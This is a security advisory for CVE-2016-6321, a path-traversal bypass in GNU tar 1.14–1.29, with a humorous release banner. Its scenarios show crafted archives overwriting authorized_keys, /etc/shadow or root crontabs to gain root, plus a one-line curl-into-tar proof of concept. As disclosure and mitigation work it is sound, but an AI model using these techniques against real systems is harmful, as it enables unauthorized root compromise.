GNU tar 1.29 Extract Pathname Bypass

`---------------- t2'16 special vulnerability release -----------------  
  
  
Vulnerability: POINTYFEATHER aka Tar extract pathname bypass  
Credits: Harry Sintonen / FSC1V Cyber Security Services  
Date: 2016-10-27  
Impact: File overwrite in certain situations  
Classifier: Full spectrum cyber  
CVSS: 4.3.2  
Threat level: Manatee  
  
//NORDIC EYES ONLY//NOFORN//PUBLIC//EXPLOIT GLOBAL//  
  
In a time when 0days are hoarded and exchanged for  
local currencies in different parts of the world,  
F-Secure CSS is going old-school and dropping a   
not-so-valuable vulnerability, for free as in beer.  
  
Tar will happily extract files & directories into  
an arbitrary location when supplied with a suitably  
crafted archive file. If a target system is extracting  
an attacker supplied file, the vulnerability can  
be exploited to gain file overwrite capability.   
  
We have exploited this vulnerability in environments  
where tar was run as root to gain root access on the  
target. In most scenarios this is a non-issue, however  
as we have witnessed, corner cases can be quite  
useful.  
  
After the communication with different parties was  
discontinued for more than 42 days, the decision was  
made to proceed with our honorable disclosure policy.  
  
Greets to our Swedish friends olleb, Linus, Daniel W,  
Ludde - see you at t2!  
  
  
`;+####', .;####':` .;####':`  
`#@@@@@@@@@@@, ;@@@@@@@@@@# ;@@@@@@@@@@#  
+@@@@@@@@@@@@@, +@@@@@@@@@@@# +@@@@@@@@@@@#  
#@@@@@#. .+@, @@@@@` ,## @@@@@` ,##  
:@@@@@, ` @@@@@: @@@@@:  
#@@@@# #@@@@@@@@'. #@@@@@@@@'.  
@@@@@: #@@@@@@@@@@; #@@@@@@@@@@;  
#@@@@+ ;#@@@@@@@@' ;#@@@@@@@@'  
'@@@@@` `#@@@@@ `#@@@@@  
@@@@@@; `'# #; `@@@@@ #; `@@@@@  
`@@@@@@@@@@@@@@# #@@@@##@@@@@@+ #@@@@##@@@@@@+  
;@@@@@@@@@@@@# #@@@@@@@@@@@+ #@@@@@@@@@@@+  
.+@@@@@@@#: :#@@@@@@#: :#@@@@@@#:  
  
Denmark · Finland · Poland · Sweden · Norway  
Cyber Industrial Complex since '07  
  
-----------------------------------------------------------------------  
  
  
CVE-2016-6321 - GNU tar extract pathname bypass  
===============================================  
The latest version of this advisory is available at:  
https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt  
  
  
Overview  
--------  
  
GNU `tar' archiver can be tricked into extracting files and   
directories in the given destination, regardless of the path   
name(s) specified on the command line.  
  
  
Description  
-----------  
  
GNU `tar' archiver attempts to avoid path traversal attacks   
by removing offending parts of the element name at extract.   
This sanitizing leads to a vulnerability where the attacker   
can bypass the path name(s) specified on the command line.  
  
  
Impact  
------  
  
The attacker can create a crafted tar archive that, if   
extracted by the victim, replaces files and directories   
the victim has access to in the target directory, regardless   
of the path name(s) specified on the command line.  
  
  
Details  
-------  
  
The discovered vulnerability, described in more detail below,   
enables file and directory overwrite attacks against the user   
or system by using a crafted tar archive. The attack requires   
that the victim or system extract the crafted tar archive prepared   
by the attacker. Automated systems extracting paths from archives   
originating from untrusted sources are in particular danger,   
especially if the extract operation is performed with elevated   
privileges.  
  
In the worst-case scenario this vulnerability can lead to a full   
system compromise (remote code execution as root).  
  
  
1. Extract pathname bypass due to safer_name_suffix usage  
  
lib/paxnames.c safer_name_suffix() function sanitizes the `file_name'   
parameter and removes the file system prefix from the name if   
`absolute_names' parameter is 0. As a result, the path name   
effectively becomes relative to the target directory, ignoring the   
path name given on the command line.  
  
  
The history of this bug is somewhat complicated:  
  
- Before 13.12.1999 commit it was possible to extract entries   
with member names containing ".." sequence(s).  
- On 13.12.1999 commit the code was changed[1] to warn about   
and skip member names that had ".." sequence(s):  
`(extract_archive): By default, warn about ".." in member   
names, and skip them.'  
- However on 05.07.2003 the code was changed[2] to use   
`safer_name_suffix' function:  
`(extract_archive): Use safer_name_suffix rather than rolling   
our own.'  
  
The unfortunate side effect of the 05.07.2003 change was that   
rather than skipping the entries with malicious member names with   
".." in them, the code would now attempt to make the malicious name  
safe. Making the name safe involves stripping all offending path   
components, thus resulting the target name being relative to the   
target directory root, regardless of the requested path name.  
  
Here is a number of practical attack scenarios:  
  
- Attack the user by replacing important files, such as   
.ssh/authorized_keys, .bashrc, .bash_logout, .profile,   
.subversion or .anyconnect, when they extract an tar archive.  
For example:  
  
user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \   
--wildcards 'blurf*'  
tar: Removing leading `blurf/../' from member names  
user@host:~$ cat .ssh/authorized_keys  
ssh-rsa AAAAB3...nU= mrrobot@fsociety  
user@host:~$   
  
  
- Attack automation that extracts tar originating from a web   
application or similar sources. Such operation might be performed by   
a setuid root component of the application. The command executed   
could be for example:  
  
#tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc  
  
The attacker can overwrite /var/spool/cron/crontabs/root to gain code  
execution as root. It is also possible to replace binaries commonly  
executed by root with a backdoored ones, or to drop setuid root   
binaries that will enable the attacker to gain root privileges at   
will. Common attack would be to replace some network facing daemon   
with backdoored one, enabling covert code execution on demand.  
  
This type of scenario has been successfully exploited in the real   
world to gain a remote code execution as root in different   
environments.   
  
- Attack commands that try to replace single files/dirs as root:  
  
The victim would like to replace `/etc/motd' file in the system by   
extracting it from an archive obtained from an untrusted source:  
  
# tar -C / -xvf archive.tar etc/motd  
tar: Removing leading `etc/motd/../' from member names  
etc/motd/../etc/shadow  
#   
  
The attacker can also bypass --exclude rule, if it is being used   
with --anchored switch. For example: The victim would like to extract  
all files but `/etc/shadow' from an archive:  
  
# tar -C / -xvf archive.tar --anchored --exclude etc/shadow  
tar: Removing leading `etc/motd/../' from member names  
etc/motd/../etc/shadow  
#   
  
In both cases, the attacker has now successfully replaced /etc/shadow  
file with arbitrary content.  
  
  
Exploiting the vulnerability works best if the attacker has some prior   
knowledge of the specifics of the tar command line that gets executed.   
The path prefix before the `..' sequence will need to (at least   
partially) match the target path (or not match in case of the exclude   
rule) in order for the bypass attack to work. Guessing which paths   
the victim might extract could work too, but the success rate is   
likely lower.  
  
  
Vulnerable versions  
-------------------  
  
- GNU tar 1.14 to 1.29 (inclusive)  
  
Affected operating systems  
--------------------------  
  
Red Hat  
Alpine Linux  
Red Star OS  
...  
any other Linux using GNU tar  
  
  
Recommended changes to GNU tar  
------------------------------  
  
1. Skip entries with member names containing a '..', or fail the whole  
tar extract operation. A proposed patch that mitigates the issue:  
  
https://sintonen.fi/advisories/tar-extract-pathname-bypass.patch  
  
  
End user mitigation  
-------------------  
  
1. If your OS distribution offers a fixed GNU tar version, install it  
  
or  
  
2. Only extract untrusted tar archives to a temporary directory in  
virtual machine  
  
or  
  
3. Prohibit full spectrum cyber operations in your enterprise.  
  
  
Proof-of-concept  
----------------  
  
$ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd  
$ cat etc/shadow  
  
  
References  
----------  
  
[1] http://git.savannah.gnu.org/cgit/tar.git/commit/src/  
extract.c?id=6e9d1539b665c8f3c173b36702ca1650cac977ad  
[2] http://git.savannah.gnu.org/cgit/tar.git/commit/src/  
extract.c?id=675c5a2f243bb5e72c982c0e3c30762ec32e9a1b  
  
  
Timeline  
--------  
  
10.03.2016 discovered the vulnerability  
11.03.2016 wrote a preliminary advisory  
11.03.2016 contacted the GNU tar maintainer for a PGP key  
14.03.2016 revised the advisory with --anchored --exclude bypass   
information  
15.03.2016 reworked the advisory slightly  
15.03.2016 sent the advisory to the GNU tar maintainer  
16.03.2016 contacted [email protected] for help in coordination  
17.03.2016 added end user mitigation via --one-top-level to the   
advisory  
17.03.2016 GNU tar maintainer didn't consider this to be an issue.   
as a result mitigation in upstream GNU tar appears   
unlikely  
23.03.2016 added more attack scenarios to the advisory  
10.08.2016 reworked the advisory slightly  
10.08.2016 polled [email protected] regarding the status of the  
coordination  
11.08.2016 CVE-2016-6321 was assigned to the vulnerability  
15.09.2016 polled [email protected] regarding the status of the  
coordination  
26.10.2016 handcrafted the ascii release file at a lobby bar  
27.10.2016 public release of the advisory at t2'16  
30.10.2016 fixed the patch to use FATAL_ERROR. ref:  
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842339#12  
`